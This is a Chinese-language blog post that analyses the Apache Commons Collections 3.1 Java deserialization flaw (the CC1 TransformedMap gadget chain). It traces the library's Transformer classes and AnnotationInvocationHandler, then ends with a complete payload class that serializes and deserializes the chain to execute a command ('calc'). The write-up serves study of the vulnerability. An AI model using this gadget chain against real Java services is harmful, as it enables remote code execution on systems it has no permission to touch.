Java反序列化漏洞之Apache Commons Collections

最新推荐文章于 2024-07-24 09:33:30 发布
最新推荐文章于 2024-07-24 09:33:30 发布
阅读量780 收藏 1
点赞数
分类专栏: 信息安全 文章标签: 信息安全 网络安全 java 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44420143/article/details/118358328
版权

Java反序列化漏洞之Apache Commons Collections

公粽号:黒掌

一个专注于分享网络安全、黑客圈热点、黑客工具技术区博主!

前言:

最近静下心来看了很多大牛的笔记,博客,收获甚多,所以在此记录一下入坑Java安全的第一步。

Apache Commons Collections是Apache Commons的组件,该漏洞的问题主要出现在org.apache.commons.collections.Transformer接口上。在Apache commons.collections中有一个InvokerTransformer实现了Transformer接口,主要作用为调用Java的反射机制来调用任意函数。

影响组件版本:<=3.1

一、环境搭建

本地测试,下载commons-collections-3.1.zip,在项目中导入对应的jar包:commons-collections-3.1.jar

例如:

在IntelliJ IDEA中创建一个普通的Java工程,然后File --> Project Structure --> Libraries --> +添加相应的jar包

二、漏洞分析

既然是反序列化漏洞,我们假设有这样一条语句:

FileInputStream fileInputStream = new FileInputStream("unserialize.bin");
ObjectInputStream input = new ObjectInputStream(fileInputStream);
Object object = input.readObject();
input.close();
fileInputStream.close();

意思是从unserialize.bin二进制文件中取出二进制数据,对其进行反序列化。

如果unserialize.bin的文件内容可控的话(也就是用户可以进行输入),那么可能会存在反序列化漏洞。

(有点类似于PHP的反序列化,利用的前提都是程序中存在可以利用的类或者利用链)

如果程序使用了低版本的Apache Commons的组件,那么就可以构造相应的输入,达到RCE的目的。

下面对commons.collections中利用的类进行分析:

在该组件中有一个Transformer接口:

package org.apache.commons.collections;

public interface Transformer {
Object transform(Object var1);
}

有一个实现了该接口的类,InvokerTransformer,可以去看看源码:

public class InvokerTransformer implements Transformer, Serializable {
private final String iMethodName;
private final Class[] iParamTypes;
private final Object[] iArgs;

public InvokerTransformer(String methodName, Class[] paramTypes, Object[] args) {
this.iMethodName = methodName;
this.iParamTypes = paramTypes;
this.iArgs = args;
}

public Object transform(Object input) {
if (input == null) {
return null;
} else {
try {
Class cls = input.getClass();
Method method = cls.getMethod(this.iMethodName, this.iParamTypes);
return method.invoke(input, this.iArgs);
} catch (NoSuchMethodException var5) {
throw new FunctorException("InvokerTransformer: The method '" + this.iMethodName + "' on '" + input.getClass() + "' does not exist");
} catch (IllegalAccessException var6) {
throw new FunctorException("InvokerTransformer: The method '" + this.iMethodName + "' on '" + input.getClass() + "' cannot be accessed");
} catch (InvocationTargetException var7) {
throw new FunctorException("InvokerTransformer: The method '" + this.iMethodName + "' on '" + input.getClass() + "' threw an exception", var7);
}
}
}

}

这里仔细分析一下transform方法,可以发现这里利用了反射机制,调用传入的对象的任意方法。

上面的三个参数分别表示的意思是:

methodName:方法名

paramTypes: 参数类型

args:传入方法的参数值

一般来说,想要RCE,需要使用到Runtime这个类,但是Runtime的构造函数是一个私有方法,所以不能够直接对其进行实例化,需要调用静态方法来实例化,例如:

Runtime.getRuntime.exec("calc");

如果想要直接调用上面的InvokerTransformer的transform方法进行命令执行,可以这样写:

Runtime runtime = Runtime.getRuntime();
InvokerTransformer invokerTransformer = new InvokerTransformer("exec",
new Class[]{String.class},
new String[]{"calc"});
invokerTransformer.transform(runtime);

个人理解:以上写法直接实例化了一个Runtime对象,但是Runtime类并没有实现序列化接口(可以去看源码),也就是说,Runtime实例对象不能够被序列化,因此在构建Payload的时候,尽量在程序中不要出现Runtime实例化出来的对象,因此后面引出了两个类:

ConstantTransformer类和ChainedTransformer类

先来看看ConstantTransformer类:

public ConstantTransformer(Object constantToReturn) {
this.iConstant = constantToReturn;
}

public Object transform(Object input) {
return this.iConstant;
}

它的transform方法会把传入的参数直接返回出来;

再来看看ChainedTransformer类:

public ChainedTransformer(Transformer[] transformers) {
this.iTransformers = transformers;
}

public Object transform(Object object) {
for(int i = 0; i < this.iTransformers.length; ++i) {
object = this.iTransformers[i].transform(object);
}

return object;
}

关键部分在这里:

object = this.iTransformers[i].transform(object);

如果iTransformers为上面的InvokerTransformer对象,我们可以构造多个InvokerTransformer对象(注意这里的iTransformers是个数组),让这条语句通过反射来创建Runtime的实例,例如:

Transformer[] transformers = new Transformer[]{//获取java.lang.classnew ConstantTransformer(Runtime.class),//执行Runtime.class.getMethod("getRuntime")new InvokerTransformer("getMethod",new Class[] {String.class, Class[].class },new Object[] {"getRuntime", new Class[0] }),//执行Runtime.class.getMethod("getRuntime").invoke()new InvokerTransformer("invoke",new Class[] {Object.class, Object[].class },new Object[] {null, new Object[0] }),//执行Runtime.class.getMethod("getRuntime").invoke().execnew InvokerTransformer("exec",new Class[] {String.class },new Object[] {"calc"})};ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);chainedTransformer.transform("123");

构造到这里,可以发现,只要执行chainedTransformer.transform()方法就可以RCE。

但是,既然是反序列化漏洞,最好的利用情况是当用户传入的输入流被反序列化以后,就能够直接进行攻击(也就是说当程序直接调用readObject方法时将触发漏洞),因此,后面引出了另外几个类:

TransformeMap和AnnotationInvocationHandler类

首先来看看TransformeMap这个类:

protected Object checkSetValue(Object value) {return this.valueTransformer.transform(value);}

在该类里面有checkSetValue这样一个方法,会调用valueTransformer.transform

也就是说这里需要构造this.valueTransformer为上面的chainedTransformer的值;

通过分析构造函数,我们发现这个值是可以直接构造的:

public static Map decorate(Map map, Transformer keyTransformer, Transformer valueTransformer) {return new TransformedMap(map, keyTransformer, valueTransformer);}protected TransformedMap(Map map, Transformer keyTransformer, Transformer valueTransformer) {super(map);this.keyTransformer = keyTransformer;this.valueTransformer = valueTransformer;}

(由于TransformedMap是受保护的构造函数,因此这里要利用该类提供的静态方法decorate进行初始化)

接下来,继续跟进TransformeMap的父类AbstractInputCheckedMapDecorator,在里面有一个静态的内部类:

static class MapEntry extends AbstractMapEntryDecorator {private final AbstractInputCheckedMapDecorator parent;protected MapEntry(Entry entry, AbstractInputCheckedMapDecorator parent) {super(entry);this.parent = parent;}public Object setValue(Object value) {value = this.parent.checkSetValue(value);return super.entry.setValue(value);}}

这里的setValue方法调用了checkSetValue,如果this.parent指向我们前面构造的TransformeMap对象,那么这里就可以触发漏洞点。

在前面的基础上加上这个:也可以命令执行

Map innerMap = new HashMap();innerMap.put("1", "1");//构造TransformedMap对象,带入前面构造的transformerChainMap outerMap = TransformedMap.decorate(innerMap, null, transformerChain);//返回Entry这个内部类Map.Entry onlyElement = (Map.Entry) outerMap.entrySet().iterator().next();onlyElement.setValue("123123");

下面分析一下 这条语句:

Map.Entry onlyElement = (Map.Entry) outerMap.entrySet().iterator().next();

首先调用outerMap.entrySet(),也就是TransformedMap的entrySet方法:

public Set entrySet() {return (Set)(this.isSetValueChecking() ? new AbstractInputCheckedMapDecorator.EntrySet(super.map.entrySet(), this) : super.map.entrySet());}

跟进一下this.isSetValueChecking:

protected boolean isSetValueChecking() {return this.valueTransformer != null;}

通过之前的构造,我们这里会返回true,也就是说,上面的outerMap.entrySet()会返回new AbstractInputCheckedMapDecorator.EntrySet(super.map.entrySet(), this);

跟进一下这个类:(它其实也是一个静态的内部类,和上面我们需要的那个MapEntry在一个类里面)

static class EntrySet extends AbstractSetDecorator {private final AbstractInputCheckedMapDecorator parent;protected EntrySet(Set set, AbstractInputCheckedMapDecorator parent) {super(set);this.parent = parent;}public Iterator iterator() {return new AbstractInputCheckedMapDecorator.EntrySetIterator(super.collection.iterator(), this.parent);}}

可以发现,它将我们传入的transformerChain赋值给了parent;

接下来程序执行iterator方法,也就是上面的:

public Iterator iterator() {return new AbstractInputCheckedMapDecorator.EntrySetIterator(super.collection.iterator(), this.parent);}

发现它返回了另一个对象,跟进一下这个对象:(仍然是一个静态内部类)

static class EntrySetIterator extends AbstractIteratorDecorator {private final AbstractInputCheckedMapDecorator parent;protected EntrySetIterator(Iterator iterator, AbstractInputCheckedMapDecorator parent) {super(iterator);this.parent = parent;}public Object next() {Entry entry = (Entry)super.iterator.next();return new AbstractInputCheckedMapDecorator.MapEntry(entry, this.parent);}}

它也将我们前面构造的transformerChain赋值给了parent;

最后程序调用next方法,也就是:

public Object next() {Entry entry = (Entry)super.iterator.next();return new AbstractInputCheckedMapDecorator.MapEntry(entry, this.parent);}

发现它正好返回了我们最终需要构造的这个内部类MapEntry,并且将parent正好赋值成我们构造的transformerChain值;

最后调用onlyElement.setValue(“123123”);触发命令执行;

分析到这里,还是不够,因为我们想要构造一个只需要调用反序列化函数便可以触发漏洞的利用链,这里就需要用到AnnotationInvocationHandler这个类(JDK版本要小于1.7),该类重写了readObject方法,在该方法里面调用了map的setValue方法:

private void readObject(java.io.ObjectInputStream s)throws java.io.IOException, ClassNotFoundException {s.defaultReadObject();// Check to make sure that types have not evolved incompatiblyAnnotationType annotationType = null;try {annotationType = AnnotationType.getInstance(type);} catch(IllegalArgumentException e) {// Class is no longer an annotation type; all bets are offreturn;}Map<String, Class<?>> memberTypes = annotationType.memberTypes();for (Map.Entry<String, Object> memberValue : memberValues.entrySet()) {String name = memberValue.getKey();Class<?> memberType = memberTypes.get(name);if (memberType != null) {  // i.e. member still existsObject value = memberValue.getValue();if (!(memberType.isInstance(value) ||value instanceof ExceptionProxy)) {memberValue.setValue(new AnnotationTypeMismatchExceptionProxy(value.getClass() + "[" + value + "]").setMember(annotationType.members().get(name)));}}}

(这个代码是网上找的,自己的jdk版本是1.8~~~~)

这里可以发现memberValues是一个map对象,并且是可以由我们直接传入参数的,它这里用到了这样一条语句:

for (Map.Entry<String, Object> memberValue : memberValues.entrySet()){memberValue.setValue(...)}

其实跟上面的构造是一样的:

memberValues.entrySet().iterator().next()

到这里,就比较明显了。我们传入一个构造好的AnnotationInvocationHandler对象,目标对其进行反序列,便会造成任意代码执行。

Payload如下:

import org.apache.commons.collections.Transformer;import org.apache.commons.collections.functors.InvokerTransformer;import org.apache.commons.collections.functors.ChainedTransformer;import org.apache.commons.collections.functors.ConstantTransformer;import org.apache.commons.collections.map.HashedMap;import org.apache.commons.collections.map.TransformedMap;import java.io.*;import java.util.HashMap;import java.lang.reflect.Constructor;import java.util.Map;import java.lang.reflect.InvocationTargetException;import java.lang.reflect.Method;public class test implements Serializable{public static void main(String[] args) throws Exception{Transformer[] transformers = {new ConstantTransformer(Runtime.class),new InvokerTransformer("getMethod", new Class[]{ String.class, Class[].class}, new Object[]{"getRuntime", new Class[0] }),new InvokerTransformer("invoke", new Class[]{ Object.class, Object[].class}, new Object[]{ null ,new Object[0]} ),new InvokerTransformer("exec",new Class[] {String.class },new Object[] {"calc"})};Transformer transformerChain = new ChainedTransformer(transformers);Map map = new HashMap();map.put("value", "2");Map transformedmap = TransformedMap.decorate(map, null, transformerChain);Class clazz = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");Constructor cons = clazz.getDeclaredConstructor(Class.class,Map.class);cons.setAccessible(true);Object ins = cons.newInstance(java.lang.annotation.Retention.class,transformedmap);//将ins序列化ByteArrayOutputStream exp = new ByteArrayOutputStream();ObjectOutputStream oos = new ObjectOutputStream(exp);oos.writeObject(ins);oos.flush();oos.close();//取出序列化的数据流进行反序列化,验证ByteArrayInputStream out = new ByteArrayInputStream(exp.toByteArray());ObjectInputStream ois = new ObjectInputStream(out);Object obj = (Object) ois.readObject();}}

三、总结

反序列化漏洞都需要用到程序中存在的已知类,因此查找存在BUG的类很重要。

Java的反序列化漏洞是真的复杂,不过确实很有意思。(就比如上面构造的iterator().next()正好契合利用的那个类的迭代)。

用到反射机制,可能是因为一些需要利用的类并没有继承反序列化接口,因此使用动态生成相应的对象可以避免不能序列化,从而可以构造想要的payload数据流。

今天的分享就到这里,喜欢的小伙伴记得一键三连,我有一个公粽号【黒掌】, 可以免费获取更多黑客秘籍,欢迎来耍!

是叶十三
关注
专栏目录
javaJavacommons-collections反序列化漏洞
九师兄
07-19 81
Apache Commons CollectionsApache Commons的组件,该漏洞的问题主要出现在org.apache.commons.collections.Transformer接口上。在Apache commons.collections中有一个InvokerTransformer实现了Transformer接口,主要作用为调用Java的反射机制来调用任意函数。影响组件版本:
Java反序列化漏洞Apache Commons Collections
m0_61506558的博客
08-08 799
CC对JDK标准库的集合类进行了扩展,添加了一些数据结构,并且提供了工具类2015年1月28日,有两个黑客发现了CC的漏洞利用链2.2 源码分析transform()方法可以通过反射机制来进行任意函数的调用通过链式调用,实现InvokeTransformer方法的自动触发1、对利用类进行序列化,然后交给Java程序反序列化2、在进行反序列化时,会执行方法,该方法会用setValue对成员变量的Value值进行修改3、value修改触发了。......
Apache Commons Collections反序列化漏洞分析与复现
smellycat000的专栏
11-30 3708
聚焦源代码安全,网罗国内外最新资讯!1.1 状态完成漏洞挖掘条件分析、漏洞复现。1.2 漏洞分析存在安全缺陷的版本:Apache Commons Collections3.2.1以下,...
反序列化漏洞_ApacheCommonsCollections反序列化漏洞分析
weixin_39618339的博客
11-30 751
点击蓝字关注我们吧!环境搭建本文由“壹伴编辑器”提供技术JDK版本为为1.6,引入commons-collections-3.1.jar包,具体引入方法为:File -> Project Settings -> Modules -> Dependencies点击加号选择导入JARs包,再选择包的地址,点击apply成功引入。Poc():本文由“壹伴编辑器”提供技术分析...
JAVA 反序列化Apache Commons Collections 反序列化漏洞分析
辛勤搬砖的门卫的专栏
03-01 2011
Apache Commons Collections 反序列化漏洞研究
Apache Commons Collections反序列化漏洞分析
辛勤搬砖的门卫的专栏
01-05 1289
Apache Commons Collections反序列化漏洞分析
反序列化渗透与攻防(三)之Apache Commons Collections反序列化漏洞
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
04-14 1381
Apache Commons Collections 是一个扩展了Java标准库里集合类Collection结构的第三方基础库,它提供了很多强有力的数据结构类型并且实现了各种集合工具类。作为Apache开源项目的重要组件,Commons Collections被广泛应用于各种Java应用的开发Commons Collections 实现了一个TransformedMap类,该类是对Java标准数据结构Map接口的一个扩展。
Java反序列化漏洞探析及其修复方法研究.pdf
07-02
Java反序列化漏洞是一种在信息安全领域引起广泛关注的新型高危漏洞,其最早在2015年被曝出,存在于Apache Commons Collections等公共库中。Java反序列化漏洞主要影响基于Java编写的各类应用程序,由于其能够远程执行...
Java反序列化漏洞Apache CommonsCollections分析
洋洋的小黑屋
05-17 528
Java反序列化漏洞Apache CommonsCollections分析 cc链,既为Commons-Collections利用链。此篇文章为cc链的第一条链CC1。而CC1目前用的比较多的有两条链,LazyMap和TransformedMap。在ysoserial工具中,利用的是LazyMap链,而我们此篇分析的则是TransformedMap链。 1.本文所需前置知识 java反序列化基础...
JAVA反序列化Apache Commons Collections反序列化漏洞分析
chenwan8737的博客
08-08 1019
Apache Commons Collections反序列化漏洞必然是2015年影响重大的漏洞之一,同时也开启了各类java反序列漏洞的大门,这几年大量各类java反序列化漏洞不断出现。java反序列化漏洞基本一出必高危,风险程度极大,最近研究了一些反序列化漏洞,本篇记录apache ...
Apache Commons Collections
04-05
Apache Commons Collectionscommons-collections-3.2.1和commons-collections4-4.0,含jar包及源码和api文档。
Apache-Commons-Collections漏洞问题
白话机器学习
08-15 1298
Apache-Commons-Collections这个框架,相信每一个Java程序员都不陌生,这是一个非常著名的开源框架。但是,他其实也曾经被爆出过序列化安全漏洞,可以被远程执行命令。
Java 反序列化漏洞-Apache Commons Collections3
cjdgg的博客
03-02 4713
Java 反序列化漏洞-Apache Commons Collections3前言javassist+TemplatesImplcom.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter 前言 之前已经学了CC1和CC2,接下来继续学习CC3。在CC2中我们用到了javassist修改字节码并配合TemplatesImpl攻击链来使用,因此我们很自然而然的想到,如果我们直接用javassist修改字节码并配合TemplatesImpl攻击链使用,就无需用I
Apache commons-collections反序列化漏洞(TransformedMap利用链)
qq_43936524的博客
04-10 568
文章目录Commons-collections概述InvokerTransformer反射触发ChainedTransformer遍历触发封装为TransformedMap寻找ReadObject触发点AnnotationInvocationHandler触发(JDK1.7)BadAttributeValueExpException(JDK1.8) Commons-collections概述 官网对Commons-collections的说明 Java commons-collections是JDK 1.
Apache Commons Collection3.2.1反序列化分析(CC1)
st3pby的博客
01-29 1978
Apache软件基金会的一个开源项目,它提供了一组可复用的数据结构和算法的实现,旨在扩展和增强Java集合框架,以便更好地满足不同类型应用的需求。该项目包含了多种不同类型的集合类、迭代器、队列、堆栈、映射、列表、集等数据结构实现,以及许多实用程序类和算法实现。它的代码质量较高,被广泛应用于Java应用程序开发中。Commons Collections 3.1 版本的利用链衍生出多个版本的利用方式,但其核心部分是相同的,不同之处在于中间过程的构造。
java反序列化漏洞学习之Apache Commons Collections
东方
07-30 1298
demo 一波。 最近群里都在学Java 参考: https://p0sec.net/index.php/archives/121/ https://www.xmanblog.net/java-deserialize-apache-commons-collections/ 1 环境 import org.apache.commons.collections.functors.Invoker...
commons-collections反序列化漏洞分析——远程代码执行
qq_45766062的博客
08-17 873
这里先说说java里面的命令执行。其实java的命令执行和PHP类似,PHP一般通过eval和system来执行系统命令。java则是通过来执行系统命令。
java反序列化漏洞学习-apachecommonscollections
最新发布
ABUG
07-24 1518
这是本地执行的结果,服务端不会有人这样写代码,特别是**transform(Runtime.getRuntime())**这样的东西,因此,当下任务是找到可以代替Runtime.getRuntime()这样写法的利用链。带还是同一个问题,这代码是在本地执行的,我们需要的是找到一个被重写的readObject()方法,可以帮我们执行transform方法。参考通过反射进行命令执行的方法,我们只要对以下三个参数可控,即可通过反射进行命令执行。这样,我们可以利用该类来执行命令。剩下的,我们要找到一个能够帮我们。
修复Java反序列化漏洞:Weblogic 10.3.6补丁更新指南
"weblogic10.3.6补丁更新是针对Java反序列化漏洞的修复过程,涉及Apache Commons Collections库,该漏洞允许攻击者远程执行操作系统命令,影响包括WebLogic在内的多个主流中间件。Oracle官方提供了补丁下载,补丁...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值